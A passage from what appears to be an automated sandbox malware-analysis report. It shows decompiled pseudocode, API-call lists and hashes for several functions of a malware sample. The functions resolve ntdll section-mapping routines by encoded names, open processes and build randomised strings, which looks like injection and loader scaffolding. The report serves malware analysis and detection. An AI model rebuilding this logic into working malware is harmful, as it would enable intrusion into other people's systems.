                                                                                                                                                                                                                                  • Part of subcall function 02BB1EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BB7528,73797325), ref: 02BB1ECB
                                                                                                                                                                                                                                  • Part of subcall function 02BB1EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BB1EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,052F8D08,73797325), ref: 02BB7545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02BB754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BB75B4
                                                                                                                                                                                                                                  • Part of subcall function 02BB7020: GetProcAddress.KERNEL32(36776F57,02BB6B1C), ref: 02BB703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 02BB7591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BB7596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 02BB759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: 4db708f08cb01f7f8cc423b0a4abaefc4568aed4605a32407a10cf9f7b3897dc
                                                                                                                                                                                                                                • Instruction ID: 6df9638dcb1fdec804437ab392f0b6563f3cb9e12b19fa52ccec7fd4748b2c74
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4db708f08cb01f7f8cc423b0a4abaefc4568aed4605a32407a10cf9f7b3897dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD313372C00209AFDB129FA4DC88EEEBBBDEF44344F0144A5E545A7111D7B49E45DF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5E8A, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                                                			E02BB5E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2bbd37c; // 0x52f9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02BB9CCC(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2bbc1ac;
				}
				_t46 = E02BB1F9B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02BB5157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2bbd2e0; // 0x273a5a8
						_t16 = _t75 + 0x2bbeb10; // 0x530025
						 *0x2bbd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02BB9CCC(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2bbc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02BB5157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02BB53BB(_v20);
						} else {
							_t66 =  *0x2bbd2e0; // 0x273a5a8
							_t31 = _t66 + 0x2bbec30; // 0x73006d
							 *0x2bbd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02BB53BB(_v12);
				}
				return _v24;
			}




























                                                                                                                                                                                                                                0x02bb5e92
                                                                                                                                                                                                                                0x02bb5e98
                                                                                                                                                                                                                                0x02bb5e9f
                                                                                                                                                                                                                                0x02bb5ea5
                                                                                                                                                                                                                                0x02bb5ea9
                                                                                                                                                                                                                                0x02bb5ead
                                                                                                                                                                                                                                0x02bb5eb0
                                                                                                                                                                                                                                0x02bb5eb5
                                                                                                                                                                                                                                0x02bb5eba
                                                                                                                                                                                                                                0x02bb5ebc
                                                                                                                                                                                                                                0x02bb5ebc
                                                                                                                                                                                                                                0x02bb5ec5
                                                                                                                                                                                                                                0x02bb5eca
                                                                                                                                                                                                                                0x02bb5ecf
                                                                                                                                                                                                                                0x02bb5ed5
                                                                                                                                                                                                                                0x02bb5edf
                                                                                                                                                                                                                                0x02bb5ee8
                                                                                                                                                                                                                                0x02bb5eef
                                                                                                                                                                                                                                0x02bb5f08
                                                                                                                                                                                                                                0x02bb5f0d
                                                                                                                                                                                                                                0x02bb5f12
                                                                                                                                                                                                                                0x02bb5f1b
                                                                                                                                                                                                                                0x02bb5f24
                                                                                                                                                                                                                                0x02bb5f35
                                                                                                                                                                                                                                0x02bb5f3e
                                                                                                                                                                                                                                0x02bb5f42
                                                                                                                                                                                                                                0x02bb5f46
                                                                                                                                                                                                                                0x02bb5f4b
                                                                                                                                                                                                                                0x02bb5f50
                                                                                                                                                                                                                                0x02bb5f52
                                                                                                                                                                                                                                0x02bb5f52
                                                                                                                                                                                                                                0x02bb5f5c
                                                                                                                                                                                                                                0x02bb5f65
                                                                                                                                                                                                                                0x02bb5f6c
                                                                                                                                                                                                                                0x02bb5f84
                                                                                                                                                                                                                                0x02bb5f88
                                                                                                                                                                                                                                0x02bb5fc5
                                                                                                                                                                                                                                0x02bb5f8a
                                                                                                                                                                                                                                0x02bb5f8d
                                                                                                                                                                                                                                0x02bb5f95
                                                                                                                                                                                                                                0x02bb5fa6
                                                                                                                                                                                                                                0x02bb5fb2
                                                                                                                                                                                                                                0x02bb5fba
                                                                                                                                                                                                                                0x02bb5fbe
                                                                                                                                                                                                                                0x02bb5fbe
                                                                                                                                                                                                                                0x02bb5f88
                                                                                                                                                                                                                                0x02bb5fcd
                                                                                                                                                                                                                                0x02bb5fd2
                                                                                                                                                                                                                                0x02bb5fd9

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB5E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 02BB5EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 02BB5EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 02BB5EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 02BB5EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 02BB5F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB5F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB5F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02BB5F73
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: 44776a7d82764b286e7b1157f18183e6d198349dbb86b3d4b01c79230a50a34b
                                                                                                                                                                                                                                • Instruction ID: 3123875964d2919a349fcd6bc1dfee47ad8474220143e9d478014d637c93612a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44776a7d82764b286e7b1157f18183e6d198349dbb86b3d4b01c79230a50a34b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0415976D0020AEBCF22AFA4CC08EEEBBB5EF44344F0544A5E904A7211D7B5DA61DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB22AB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E02BB22AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2bbd2e0; // 0x273a5a8
				_t1 = _t9 + 0x2bbe62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02BB1BB5(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02BB5157(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02BB73E0(_t34, _t41, _a8);
						E02BB53BB(_t41);
						_t42 = E02BB15FD(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02BB53BB(_t36);
							_t36 = _t42;
						}
						_t43 = E02BB698B(_t36, _t33);
						if(_t43 != 0) {
							E02BB53BB(_t36);
							_t36 = _t43;
						}
					}
					E02BB53BB(_t28);
				}
				return _t36;
			}














                                                                                                                                                                                                                                0x02bb22ab
                                                                                                                                                                                                                                0x02bb22ae
                                                                                                                                                                                                                                0x02bb22af
                                                                                                                                                                                                                                0x02bb22b7
                                                                                                                                                                                                                                0x02bb22be
                                                                                                                                                                                                                                0x02bb22c5
                                                                                                                                                                                                                                0x02bb22c9
                                                                                                                                                                                                                                0x02bb22cf
                                                                                                                                                                                                                                0x02bb22d6
                                                                                                                                                                                                                                0x02bb22db
                                                                                                                                                                                                                                0x02bb22ed
                                                                                                                                                                                                                                0x02bb22f1
                                                                                                                                                                                                                                0x02bb22f5
                                                                                                                                                                                                                                0x02bb22fb
                                                                                                                                                                                                                                0x02bb2300
                                                                                                                                                                                                                                0x02bb2310
                                                                                                                                                                                                                                0x02bb2312
                                                                                                                                                                                                                                0x02bb2329
                                                                                                                                                                                                                                0x02bb232d
                                                                                                                                                                                                                                0x02bb2330
                                                                                                                                                                                                                                0x02bb2335
                                                                                                                                                                                                                                0x02bb2335
                                                                                                                                                                                                                                0x02bb233e
                                                                                                                                                                                                                                0x02bb2342
                                                                                                                                                                                                                                0x02bb2345
                                                                                                                                                                                                                                0x02bb234a
                                                                                                                                                                                                                                0x02bb234a
                                                                                                                                                                                                                                0x02bb2342
                                                                                                                                                                                                                                0x02bb234d
                                                                                                                                                                                                                                0x02bb234d
                                                                                                                                                                                                                                0x02bb2358

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB1BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,02BB22C5,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?), ref: 02BB1C1C
                                                                                                                                                                                                                                  • Part of subcall function 02BB1BB5: sprintf.NTDLL ref: 02BB1C3D
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB73E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02BB230F,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB73F7
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                  • Part of subcall function 02BB15FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02BB2329,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB1607
                                                                                                                                                                                                                                  • Part of subcall function 02BB15FD: _snprintf.NTDLL ref: 02BB1665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: 98edf6c10176265a5d10af34a87facb9880559517a931adf78282e79dfbad277
                                                                                                                                                                                                                                • Instruction ID: 5fd76484b63c4af30a9ce415d64d3996152cb888605cb7794605c22c8fc753ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98edf6c10176265a5d10af34a87facb9880559517a931adf78282e79dfbad277
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211A3339015256B862377B89C84CFF3AAEDF897943098596FA4597200DEF8C9025BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6246, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6246(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2bbd2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2bbd294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2bbd290 = _t6;
					 *0x2bbd29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2bbd28c = _t7;
					if(_t7 == 0) {
						 *0x2bbd28c =  *0x2bbd28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                                                                                                                0x02bb624e
                                                                                                                                                                                                                                0x02bb6254
                                                                                                                                                                                                                                0x02bb625b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb62b5
                                                                                                                                                                                                                                0x02bb625d
                                                                                                                                                                                                                                0x02bb6265
                                                                                                                                                                                                                                0x02bb6272
                                                                                                                                                                                                                                0x02bb6272
                                                                                                                                                                                                                                0x02bb62b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb62b2
                                                                                                                                                                                                                                0x02bb6274
                                                                                                                                                                                                                                0x02bb6274
                                                                                                                                                                                                                                0x02bb6279
                                                                                                                                                                                                                                0x02bb628b
                                                                                                                                                                                                                                0x02bb6290
                                                                                                                                                                                                                                0x02bb6296
                                                                                                                                                                                                                                0x02bb629c
                                                                                                                                                                                                                                0x02bb62a3
                                                                                                                                                                                                                                0x02bb62a5
                                                                                                                                                                                                                                0x02bb62a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb62ac
                                                                                                                                                                                                                                0x02bb626e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6270
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BB4D41,?,?,00000001,?,?,?,02BB5992,?), ref: 02BB624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB6279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB6296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB62B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: 1c2695c37bbec12de7f759dda8e93d91fd458f67ce691ae8df5cd2518ab35d7f
                                                                                                                                                                                                                                • Instruction ID: c4d7624046d3a3dbc89ec888ba0888fc5137fe72b5b6918ef15023676f0ac5d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c2695c37bbec12de7f759dda8e93d91fd458f67ce691ae8df5cd2518ab35d7f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F06D74E803029FEA178B24A819B693B69EB05791F00092AE5C6C72C0D7F4C820CF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB10E9, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 02BB1143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 02BB1157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 02BB1169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB11EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 8e5d36c099f4e239a52e644a908d0759da347a2eb5de0cf95c9cfd6a1b984046
                                                                                                                                                                                                                                • Instruction ID: 0e002af3aa3648c4700196582575d22269d7ffbffec353e99935981342b31202
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e5d36c099f4e239a52e644a908d0759da347a2eb5de0cf95c9cfd6a1b984046
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD416D36D10609AFDB02DFBCD844AEEB7BAEF49304F144466ED14EB210DBB19945CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6856, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02BB5157(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2bbd2e0; // 0x273a5a8
					_t1 = _t23 + 0x2bbe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2bbd2e0; // 0x273a5a8
					_t2 = _t26 + 0x2bbe782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02BB53BB(_t54);
					} else {
						_t30 =  *0x2bbd2e0; // 0x273a5a8
						_t5 = _t30 + 0x2bbe76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2bbd2e0; // 0x273a5a8
							_t7 = _t33 + 0x2bbe4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2bbd2e0; // 0x273a5a8
								_t9 = _t36 + 0x2bbe406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2bbd2e0; // 0x273a5a8
									_t11 = _t39 + 0x2bbe792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02BB5C55(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                                                                                                                0x02bb6865
                                                                                                                                                                                                                                0x02bb6869
                                                                                                                                                                                                                                0x02bb692b
                                                                                                                                                                                                                                0x02bb686f
                                                                                                                                                                                                                                0x02bb686f
                                                                                                                                                                                                                                0x02bb6874
                                                                                                                                                                                                                                0x02bb6887
                                                                                                                                                                                                                                0x02bb6889
                                                                                                                                                                                                                                0x02bb688e
                                                                                                                                                                                                                                0x02bb6896
                                                                                                                                                                                                                                0x02bb689d
                                                                                                                                                                                                                                0x02bb689f
                                                                                                                                                                                                                                0x02bb68a4
                                                                                                                                                                                                                                0x02bb6923
                                                                                                                                                                                                                                0x02bb6924
                                                                                                                                                                                                                                0x02bb68a6
                                                                                                                                                                                                                                0x02bb68a6
                                                                                                                                                                                                                                0x02bb68ab
                                                                                                                                                                                                                                0x02bb68b3
                                                                                                                                                                                                                                0x02bb68b5
                                                                                                                                                                                                                                0x02bb68ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb68bc
                                                                                                                                                                                                                                0x02bb68bc
                                                                                                                                                                                                                                0x02bb68c1
                                                                                                                                                                                                                                0x02bb68c9
                                                                                                                                                                                                                                0x02bb68cb
                                                                                                                                                                                                                                0x02bb68d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb68d2
                                                                                                                                                                                                                                0x02bb68d2
                                                                                                                                                                                                                                0x02bb68d7
                                                                                                                                                                                                                                0x02bb68df
                                                                                                                                                                                                                                0x02bb68e1
                                                                                                                                                                                                                                0x02bb68e6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb68e8
                                                                                                                                                                                                                                0x02bb68e8
                                                                                                                                                                                                                                0x02bb68ed
                                                                                                                                                                                                                                0x02bb68f5
                                                                                                                                                                                                                                0x02bb68f7
                                                                                                                                                                                                                                0x02bb68fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb68fe
                                                                                                                                                                                                                                0x02bb6904
                                                                                                                                                                                                                                0x02bb6909
                                                                                                                                                                                                                                0x02bb6910
                                                                                                                                                                                                                                0x02bb6915
                                                                                                                                                                                                                                0x02bb691a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb691c
                                                                                                                                                                                                                                0x02bb691f
                                                                                                                                                                                                                                0x02bb691f
                                                                                                                                                                                                                                0x02bb691a
                                                                                                                                                                                                                                0x02bb68fc
                                                                                                                                                                                                                                0x02bb68e6
                                                                                                                                                                                                                                0x02bb68d0
                                                                                                                                                                                                                                0x02bb68ba
                                                                                                                                                                                                                                0x02bb68a4
                                                                                                                                                                                                                                0x02bb6939

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BB74C1,?,00000001,?,?,00000000,00000000), ref: 02BB687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BB689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BB68B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BB68C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BB68DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BB68F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB5C55: memset.NTDLL ref: 02BB5CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
